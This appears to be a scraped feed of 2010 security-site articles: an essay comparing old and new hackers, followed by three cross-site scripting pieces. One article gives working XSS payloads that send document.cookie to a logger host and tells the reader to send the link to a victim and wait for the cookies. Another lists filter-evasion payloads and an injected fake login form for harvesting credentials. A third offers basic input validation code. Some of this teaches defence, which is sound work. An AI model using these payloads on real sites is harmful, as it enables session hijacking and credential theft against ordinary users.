The new hackers of the 90’s, as it seems, are not living up to what the old hackers expect of them. A good portion of old hackers go to great measures to define themselves apart from this new class of hackers. Although what most of these old hackers do not realize is that they are quite similar to the new generation of hackers. They are simply too stubborn to look into the reasons why the new hackers do this and they do not understand why these new hackers act the way they do.

According to some old hackers, there is a clear distinction between old and new hackers. The old hackers, as they say, were determined to create, while the new hackers determine to hinder and demolish, to cause havoc. They say that the old hackers enjoyed being in complete control over their computers while the new hackers enjoy the power they get through their computers over other people. They claim that they, the old hackers, sought to improve, while the second group sought to exploit. To simplify things: the old hackers believe they are computer geniuses and that the new hackers are computer terrorists.

Let’s take a look at what old hackers were like. Old hackers were very well known for getting around locks of both the electronic and physical variety. Is there really much difference between the old hackers who justified their actions because they felt that they should have free access to the IBM mainframe, to the new hackers who feel that they should not be denied free access to massive commercial databases without first getting an expensive account? The old hackers were also known for exploiting phone security and exploring different hacks to make free phone calls to unsuspecting places. The old hackers had resented the phone companies for their refusal to share their technical information about telephones. Old hackers believed they were liberating information which they thought should be freely available.

New hackers also believe that while computers can be used as tools to make everyone’s lives easier or as a tool to create beauty, they are also being used to limit freedom and autonomy— they use this to justify that control over computers is simply an act of self defence. Hacking for some hackers is more than just a mere game, or a method to get free stuff off the internet, for them it is a way of life.

There just might be a point in time where the old and new hackers will talk about how similar they really are instead of their difference. While it is true that there are some hackers out there, who do unethical and uncouth things, the old hackers should realise that they are a completely different breed of hackers who have nothing to do with the average ethical hacker with whom they share much similarities with.]]> Tue, 17 Aug 2010 08:05:16 +0000 013d407166ec4fa56eb1e1f8cbe183b9 Cross Site Scripting: Different Methods Version: 3 http://www.astalavista.com/page/articles/_/lectures/cross-site-scripting-different-methods-version-3-r37
Here is where I will discuss some different syntaxes of XSS and how to steal cookies. I will also explain the idea of how the XSS syntaxes work.
a)
<script src=http://site.com/evil.js>

This works because when a website allows JavaScript to be executed, you can have a pre-made JavaScript file type on a remote server and the <script src=""> tag will read from it and execute it on the page.



B)
'"/></><script src=http://site.com/evil.js>

This is what I mostly use to escape fields on the website. Let's say that I search for "test", and the next page has the word "test" in the search field again, I will try to escape it with this code.
c)
<img src=xss.png onerror="document.location='http://site.com/log.php?cookie='"+document.cookie>

This script will try to include a fake image named "xss.png" and will automatically error. On the error, it will execute the JavaScript to redirect to a logger and log the victim's cookie.
d)
<script>document.location="http://sitea.com/log.php?c="+document.cookie+"&redirect=http://siteb.com";</script>

This is the most basic JavaScript for a cookie stealing attempt. This is what would most likely be placed inside one of the many .js files being retrieved by a remote server.
This script will redirect the webpage to http://sitea.com/log.php?c=[THEIR COOKIE]&redirect=http://siteb.com

The GET variable c contains the user's cookie from the following page. The redirect part is just another GET var that will redirect them away from the logger, to another website, so that they do not notice anything TOO strange. The best way to avoid suspicion is to redirect them to the same site, just a different page.

Breakdown of the JavaScript if you didn't already know it:

document.location=""; or document.location(); is a function in JavaScript that changes the document (webpage)'s

location. document.cookie is JavaScript's way of storing cookie information on a website. Mostly everything can be called from document.* whatever.

After that, all that is pretty much left to do is send a link containing the URL with the XSS vulnerability in it to your victim and let he/she click it, while you wait for your cookies.]]> Tue, 10 Aug 2010 08:06:30 +0000 3988c7f88ebcb58c6ce932b957b6f332 Cross Site Scripting: Prevention: Version 2 http://www.astalavista.com/page/articles/_/lectures/cross-site-scripting-prevention-version-2-r36
The easiest way to find XSS holes in websites is manually. I'm sure you can write a script to do it for you, but that takes the fun out of it.

When searching for holes, you might want to check these fields:
a) Search Field
B) Comment Fields
c) Feedback Forms
d) Login Forms
e) Error Pages

To see if they are vulnerable, I use simple syntax for both HTML and JavaScript. "<h1>a</h1>" and "<script>alert(1)</script>". I know if the following page has either a large heading that reads "a" or an alert box that says "1", the field is vulnerable.

First off, let's get a couple of things straight -- be smart, not stupid. Follow these simple rules:

1. If you're expecting a particular type of data, check to ensure that it is what you're expecting.
2. Check the length -- if you expect a fName of only 25 characters, chop extra characters off and drop 'em. Don't give evil Eddie any sort of chance to do a lot of damage.
3. Look for non-valid characters -– like < or > or the ubiquitous ;. Don't just take whatever you get from the querystring; question all your input. Trust no one. Really.


Ok, here's a smidget of code -- obviously, you'll want to flesh this out to fit your particular site:
private bool checkValueQS(string QS)
{

Regex r = new Regex("[^0-9a-zA-Z]");

// Find a single match in the string.

Match m = r.Match(QS);  

if (m.Success)  

{

 return true;

}

return false;

}
This isn't Rocket Science -- it's pretty easy in concept. All I'm doing is trying a NOT match against the numbers 0-9 and valid letters a-z and A-Z. Anything else is forbidden. You can then redirect your malicious end user who was trying to pass in the 'ol script tags.
Try this the next time you want to check up on Lumpy:
private void Page_Load(object sender, System.EventArgs e)

{

if (Request.QueryString["fName"] != null)

{                

if (checkValueQS(Request.QueryString["fName"].ToString()) == false)

{

 Response.Write("Hello " + Request.QueryString["fName"]);

 }

 else

 {

 Response.Write("Hello... JERK!");

  }

}

}
Notice that if the end user does try to pass anything other than a number or an alpha, they get told off with a Response.Write("Hello... JERK");]]> Tue, 10 Aug 2010 08:05:17 +0000 42a0e188f5033bc65bf8d78622277c4e Cross Site Scripting Version 1 http://www.astalavista.com/page/articles/_/guides/cross-site-scripting-version-1-r35 Something that everyone should know | Something that everyone may not know
Author: Kshitij kumar
Email: krayknot@yahoo.com


As the name implies, Cross Site Scripting means a sort of Scripting that is done outside the scope of the website. For example: A website is providing a text box to input some text and a malicious user is entering some script(s) [ mostly Javascript ] inside that text box to execute those scripts on the server or anyway.
“Cross Site Scripting” abbreviated as “XSS” not “CSS” as “CSS” has already denoted for “Cascading Style Sheet”.

Website owners must know the serious consequences of XSS when exploited on a vulnerable web application. Site owners says that it cannot be used to steal sensitive data from their database. This is a common mistake. There are stories where it was claimed that XSS is not really a risk. and this is someting a challenge for the hackers and that hackers always willing to accept,
A practical example of XSS on a test site
The following example shows how XSS can be used to modify the functionality of a web page and to re-design the page as per the hackers will: [third party example]

Load the following link in your browser: http://testasp.acunetix.com/Search.asp, you will notice that the page is a simple page with an input field for running a search
Try to insert the following code into the search field, and notice how a login form will be displayed on the page:

<br><br>Please login with the form below before proceeding:<form action="destination.asp"><table><tr><td>Login:</td><td><input type=text length=20 name=login></td></tr><tr><td>Password:</td><td><input type=text length=20 name=password></td></tr></table><input type=submit value=LOGIN></form>

Then simply hit the search button after inserting the code.
Through the XSS flaw on the page, it has been possible to create a FAKE login form which can gather a user’s credentials. As seen in step 2, the code contains a section which mentions “destination.asp”. That is where a hacker can decide where the FAKE login form will send the user’s log-in details for them to be retrieved and used maliciously
A hacker can also inject this code by passing it around via the browser’s address bar as follows:

http://testasp.acune...3E%3C%2Fform%3E

It is the process of injecting JavaScript (mainly) and also HTML into a webpage for important feedback. This feedback may contain many things; one, most commonly being the user's cookie. A cookie is the variable that web-browsers use to store your login credentials. Without a cookie, you cannot "stay logged in" on your favorite websites. This is important because if somebody were to obtain your cookie, he/she could easily spoof your login information without any need of knowing your password. XSS is, in my opinion, the most common and dangerous exploit that exists on the internet today. It is dangerous because it is common (and useful), and it is common because it is most overlooked. Most WebPages today are user-interactive, which basically means that the website allows the user to interact with its content. Some of this interactivity may include search fields (most commonly), login forms, comment fields, feedback forms etc..

XSS attacks can be termed as such attacks that bypass the system checks and act themselves as a part of the system. This mainly happens due to the non-sanitizing structure of HTML that has the capability to take any command [ in the proper tags ] and to display it on the user end. One single hole in the website that allows to enter scripts can harm anything in the website, that can be any page content, cookie(s), link(s) or even the Page redirection statements on the client side.

The malicious user can use mostly the Javascript to target any website. But XSS is not limited to Javascript only it may be JAVA, VBScript, Flash or any other web supported scripting language.

Most of the big brands in the website colony has became the prey of XSS like Yahoo, Google, Orkut and Facebook with the loss of huge revenue. Now they have controlled the threat but not cent percent. Each and everyday more than 50% of the new websites are targeting for the XSS attacks due to their weak security and validation structure.

There is no standard way of injecting XSS into any website. Even it is not necessary to have the XSS code inside the <script> tags. This may be any method, any combination of characters, even in the Hexadecimal format XSS can insert, but the main measure is that how the website accepts the input from the user and what type of input it accepts from the user.

How it works
HTML encoding structure is such that it accepts every command or phrase withing the tags( <\> ) and hence there is a possibility to insert any tag(s) in a page that afterwards could act as a part of the same page with other HTML tag(s).

At the first sight, it seems that the effect of the XSS is limited to only one user and previously at the beginning days of XSS the malicious scripts were responsible for the damage of User interface and some images only, but as the resources grew, technology advanced, the way of XSS injection changed tremendously.

We can divide the XSS threats in two ways:
1. Non Persistent scripts.
2. Persistent Script.

1. Non Persistent Scripts: If XSS attack is for some limited area only, eg: to change the behaviour, font, color of the website only then it is somewhat that can control.

2. Persistent Script: But if the XSS attack is something that resides in the Server that can be more harmful for the complete system. Persistent XSS attack can even lead the complete system to be hacked.

1. Basic XSS
When the user searches for something and the input is reflected on the page, this may show signs of XSS possibilities. If the user were to search for <script>alert(1)</script>, and the returning page contained and alert box that read "1", the field is also vulnerable to XSS Injection.

2. HTTP Response Splitting
This has something to do with the headers that your browser uses to communicate to the server with. If the webpage allows you to modify them via post or get vars, and reflects the information back, you can easily modify these headers to your needs in order to cross-site script the page. Most commonly, the header's that are XSS'able are the User-Agent: headers. Most pages don't sanitize the user agent when reflecting back the user's browser properties (most commonly on a 404 page.)

Previously the attacks were limited to the HTML only. for eg: I have to display my name in Bold and in Red Color and the website in which my profile is, not allows Text Formatting then i can add my name in tags like <Font color = “Red” Bold = “True”>MyName</Font> and then i will save this string and if the website is simply displaying my name then this string will be treating as a part of HTML of the same page and the name will appear Bold and Red every time as the string “<Font color = “Red” Bold = “True”>MyName</Font>” is saved in the database.

You're passing a user's first name around from one page to another and then are displaying that querystring value on the page with a Response.Write, here you are increase the chances of XSS.

For Example:
http://whatzit.com/w...spx?fName=Lumpy
Now you want some changes:
Response.Write(\\"Hello \\" + Request.QueryString(\\"fName\\"));
When you run this code you get the following output:
Hello Lumpy
Here's some more that would produce the "Hello Lumpy" output:
http://whatzit.com/w...spx?fName=Lumpy
But here is something dangerous!
http://whatzit.com/w...rm1.aspx?fName= <script language='javascript'>alert("beotch");</script>
now, the browser will popup a nice little box telling you "beotch"!
Any code you execute in JavaScript can be piped into your site using the Cross Site Scripting vulnerability.
Check out this..
http://whatzit.com/w...x?fName=<script language='javascript'>window.navigate('http://mrPron');</script>
Now, Check out this next line...
<a href="http:// whatzit.com/whatthe/WebForm1.aspx?fName=<script language='javascript'>window.navigate('http://mrPron');</script>">Mole Hair Removal</a>

I send someone a valid link to a URL, maybe they do make it to the site, but they also get something else... the nasty little JavaScript in the link.

But now a day(s) due to advent of new technologies like AJAX, DOM model(s), the situation is somewhat grave. How?
A malicious user finds some information in a social networking website as follows:

- Span tag (if available) or tag information of the “Sign Out” button, say the id of the <span> tag of Sign out is “spSIgnOut”.
- a page where the user can enter text or Scraps.
- all the input controls on the page [including hidden controls by using the Source of the Web page ].
- all the input controls of which information saves in the database on postback.

Here to understand we assume that the website is not optimized for XSS attacks.

Now the malicious user enters a script in one of the text box inside <script> tag, in the script the user changing the InnerHTML of the span tag “spSignOut”:

<script language = ‘javascript’>
!--Code to change the innerhtml of the sign out span with the alert(‘you cannot sign out of the system’);
</script>

After entering this command, the malicious user saves the scrap. Now on the opening of the same scrap the html link of the sign out link will have been changed. And this is inside the database, it will happen again and again. And by this way the malicious user would have been changed the HTML by XSS.

You can now imagine how dangerous the XSS is.

You can use some measures to avoid this like:
1. Enocoding and Decoding of Tags if present in any input
2. Disabling scripts
3. Matching the Response and Request data on each postback.

But can the traditional methods can stop the XSS threats??
I think NO because here are some other methods to inject XSS like:

'';!--"<XSS>=&{()}

and,

<IMG SRC="javascript:alert('XSS');">

and,

<IMG SRC=javascript:alert('XSS')>

and,

<iframe src=http://ha.ckers.org/scriptlet.html <

and,

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

and,

exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

and,
many other ways even i dont know

So enjoy the article and in next Version 2 , I will share some more about the “XSS”

Au rvoir!!]]> Tue, 10 Aug 2010 08:03:09 +0000 7f1de29e6da19d22b51c68001e7e0e54